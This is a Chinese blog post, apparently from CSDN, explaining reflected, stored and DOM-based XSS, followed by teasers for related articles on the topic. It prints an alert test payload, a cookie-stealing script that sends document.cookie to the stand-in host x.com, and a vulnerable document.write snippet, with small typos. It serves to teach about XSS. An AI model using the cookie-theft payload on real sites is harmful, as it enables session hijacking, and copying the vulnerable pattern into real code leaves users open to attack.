反射型XSS漏洞

最新推荐文章于 2023-10-15 01:06:40 发布
最新推荐文章于 2023-10-15 01:06:40 发布
阅读量1.6k 收藏
点赞数
分类专栏: XSS 文章标签: javascript 脚本 浏览器 url object image

反射型XSS漏洞
由于这种漏洞需要一个包含Javascript的的请求,这些请求又被反射到提交请求的用户,所以成为反射型XSS,又称一阶XSS。
实例:动态页面向用户显示消息 .com/error.php?message=sorry%2c+an+error+ocurred
判断 .com/error.php?message=<script>alert(‘zidane’)</script>
利用漏洞
最常见的利用方式,会话劫持(cookie截获)
用户登录的时候会得到一个保护令牌的cookie,以下代码:
.com/error.php?message=<script>var+i=new+Image;+i.src=”http://x.com/“%2bdcument.cookie;</script>
包含的代码为:
<scirpt>
var i=new Image;
i.src=" http://x.com/"+document.cookie ;
</script>这是一个简易的盗取cookie代码,攻击者监控其x.com收到的请求,便可得知用户的cookie(改良的该代码可以发送cookie到邮箱或页面)
这么做的原因:
1.站点的可信度
2.任何脚本不可以访问其他站点的cookie,只有自己站里的脚本可以请求自己的cookie
注意:
1.一个域的页面可以向另一个域提出任意请求,,但它不能处理那个请求返回的数据。
2.一个域的页面可以从另一个域加载脚本,并在自己的域中执行,这是因为脚本被假定包含代码不包含数据,因此跨域访问并不危险,一旦这种假设被违反了将造成跨站攻击。
3.一个域的页面不能访问另一个域的cookie或其他DOM对象。
保存型XSS漏洞
用户提交的数据,被保存到应用程序中,或者是数据库中,然后不过滤就显示给其他用户,就有可能构成这种漏洞。
因为这种攻击至少要向应用程序提出两次请求,所以被称为二阶XSS。比反射型危害更大。
基于DOM的XSS
这类XSS漏洞中,攻击者的javascript通过如下过程执行
用户请求一个经过设计的URL,它由攻击者提交,其中包含JavaScript 
服务器的响应中不包含攻击者的漏洞 
当用户的浏览器处理这个响应时,脚本得到处理 
由于客户端JavaScript可以访问浏览器的文本对象模型(DOM,Document Object Model),因此它能够决定用于加载当前页面的URL,应用程序发布的脚本可以从URL中提取数据,然后处理,用他来动态更新页面的内容。
假如error.php包含以下内容:
<script type="text/javascript">
var a = document.URL;
a = unescape(a);
document.write(a.substring(a.indexOf("message=")+8,a.lentth));
</script>攻击者继续提交 .com/error.php?message=<script>alert(‘zidane’)</script> 即可出发漏洞


fallinsky
关注
专栏目录
php反射xss,利用反射XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 770
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
xxs漏洞危害_反射XSS漏洞详解
weixin_42494890的博客
12-24 2259
反射XSS漏洞如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞。通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户。对于开发者而言,使用这种机制非常方便,因为它允许他们从应用程序中调用一个定制的错误页面,而不需要对错误页面中的消息分别进行硬编码。例如,下面的URL返回如图12-1所示的错误消息:分析被返回页面的HTML源代码后,我们发现,应用程...
php反射xss,反射XSS测试及修复
weixin_28744613的博客
04-01 1381
反射XSS一般出现的位置,如GET参数中测试搜索功能F12查看源码,查找出现1111的位置第一个位置在title处尝试闭合掉title标签,然后测试JS代码,成功弹窗查看源码,XSS执行第二处位置在搜索框,此处XSS无法执行,因为位于value属性内,需要将其闭合测试时注意闭合掉多余的双引号”接下来对XSS漏洞进行源码修复第一处XSS在title位置,输入的搜索参数ks直接echo输出,没有进行...
【网络安全】详解XSS漏洞反射XSS漏洞
yyyyyybw的博客
09-25 1277
反射XSS漏洞是Web应用程序中常见的安全漏洞,攻击者可利用该漏洞注入恶意代码,窃取用户敏感信息、篡改页面内容、操纵页面行为等。为确保Web应用程序的安全性,应该采取必要措施对输入数据进行严格验证、转义和过滤处理。如果你也想学网络安全,做一个白帽黑客,我为你整理了一套完整的详细的教程资料,戳网络安全(黑客)自学笔记+学习路线+配套视频教程(超详细)t=N7T8。
XSS漏洞原理及防御方式
最新发布
weixin_54786196的博客
10-15 876
XSS全称是Cross Site Scripting即跨站脚本,为了与层叠样式表Cascading Style Sheets,CSS)的缩写进行区分,将跨站脚本攻击缩写为XSS,其本质是攻击者在web页面插入恶意的script代码(这个代码可以是JS脚本、CSS样式或者其他意料之外的代码),当用户浏览该页面之时,嵌入其中的script代码会被执行,从而达到恶意攻击用户的目的。
【Java代码审计】XSS漏洞产生原理及其修复
m0_62783065的博客
05-17 5478
【Java代码审计】XSS漏洞产生原理及其修复
复现XSS漏洞及分析
qq_61739597的博客
09-01 3092
跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS
java 防止反射_解决反射XSS漏洞攻击
weixin_29777019的博客
02-25 3216
对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台。一、首先从前端考虑过滤一些非法字符。前端的主控js中,在 输入框标签中,找到点击发送按钮后,追加到聊天panel前 进行过滤input输入内容1 // 过滤xss反射漏洞2 filterinputtxt: function (html) {3 html = html.repl...
解决反射XSS漏洞攻击
weixin_30466953的博客
03-03 4632
对于程序员来说安全防御,无非从两个方面考虑,要么前端要么后台。 一、首先从前端考虑过滤一些非法字符。 前端的主控js中,在<textarea> 输入框标签中,找到点击发送按钮后,追加到聊天panel前 进行过滤Input输入内容 1 // 过滤XSS反射漏洞 2 filterInputTxt: function (html) ...
反射XSS漏洞基础
Ethan024的博客
03-11 340
XSS漏洞基础(本文仅供技术学习与分享) 反射XSS(GET)漏洞弹窗 实验准备: 皮卡丘靶场 实验步骤: 2. 确认页面是否存在XSS漏洞;在对应的输入点输入危险字符,包括’, ", <, >以及危险字符串等; 3. 确认输入后是否会被过滤,输出是否会被处理; 4. 这里输入<>后,发现输入的字符串未被过滤或转义: 5. 查看源码发现,发现我们输入的<>被输出在标签里面: 6. 因此我们可以推测,如果输入JavaScript代码,也不会被过滤。因此输入简单的
XSS 攻击的检测和修复方法
Java徐师兄的博客
07-13 3084
XSS 攻击是一种常见和危险的 Web 攻击,开发者需要对输入数据进行过滤和转义,使用安全的编程语言和框架以及安全的数据库操作,采用 CSP 等措施来防止 XSS 攻击。同时,用户也需要注意不要轻易点击不明来源的链接,避免被诱导访问恶意网站,从而保护自己的信息安全。// 去除输入数据中的 HTML 和 PHP 标签 $data = strip_tags($data);
xss漏洞原因以及如何应对
风烟
01-26 9309
场景一:获取URL参数含有脚本执行 比如我们需要获取URL中某个参数,然后输出到页面当中 比如链接是http://xxx?search="><script>alert('xss')</script>这种,我们解析search参数拼接html的之后直接用了这个参数,这个时候浏览器不知道是恶意代码,直接就执行了, <div> xxx: "><script>alert('xss')</script> </div> 这
XSS相关知识点
weixin_50931715的博客
08-03 1194
它是基于DoM文档对象模的一种漏洞,并且DOMXSS是基于JS上的,并不需要与服务器进行交互。不同于反射XSS和存储XSS,基于DOM的XSS跨站脚本攻击往往需要针对具体的 Javascript DOM代码进行分析,并根据实际情况进行XSS跨站脚本攻击的利用。形成XSS漏洞的主要原因是程序对输入和输出的控制过滤不够完善、严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。在危害性上:存储XSS > DOM-XSS > 反射XSS。二、XSS产生的原因。...
XSS漏洞介绍及反射XSS
weixin_44720762的博客
04-28 2万+
什么是XSS攻击: XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制–例如同源策略(same origin policy)。这种类漏洞由于被黑客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。 XSS分类: 类A,本地利用漏洞,这种漏...
记录一次修复XSS安全漏洞
weixin_44777693的博客
09-30 2978
前几天收到安全部门的邮件:你负责的项目有个XSS安全漏洞需要修复。我内心:安全知识倒是了解些,到底该怎么去修复,还是一头雾水。。。 什么是XSS呢? XSS漏洞为跨站脚本漏洞,分为反射、持久、DOM反射漏洞的触发是用户点击了被篡改的URL,篡改的数据经前端传到后端后展示在前端,并在前端执行,受影响的是指定浏览器;持久漏洞是用户输入非法内容,经前端上传到后端,并入库,后经后端传给前端,在前端执行,受影响的是任何访问指定连接的浏览器;DOM漏洞是用户点击了被篡改的url,篡改后的数据直接...
XSS漏洞修复方案
热门推荐
若明天不见
07-19 3万+
XSS漏洞介绍、XSS危害及相关修复方案 XSS的原理是WEB应用程序混淆了用户提交的数据和脚本的代码边界,导致浏览器把用户的输入当成了脚本代码来执行。XSS的攻击对象是浏览器一端的普通用户。
xss漏洞安全编码系列详解
06-22
结合在csdn上web渗透测试课程(https://edu.csdn.net/course/detail/8064该课程主要讲解攻击过程),讲解xss的攻击原理及漏洞编码,现场带领大家编写补丁代码,真正在代码层面上杜绝该类漏洞的存在。
【安全牛学习笔记】Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令
weixin_34159110的博客
09-06 1654
持久加密USB安装-1LUKS: linux UNified Key Setup 磁盘分区加密规范 不依赖于操作系统的磁盘级加密 Windows——DoxBox 后端:dm-crypt 前端:cryptsetup 微软的bitlocker将镜像刻录到U盘 dd if=kali-linux-1.1.0-amd64.iso of=/dev/sdb bs=1Mroot...
java 反射xss漏洞
06-02
Java反射XSS漏洞是指攻击者利用Java反射机制构造恶意输入,从而触发Web应用程序的反射机制,导致恶意代码被执行的漏洞。攻击者可以通过构造恶意请求,将恶意代码注入到应用程序中,使得用户在访问页面时受到攻击。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值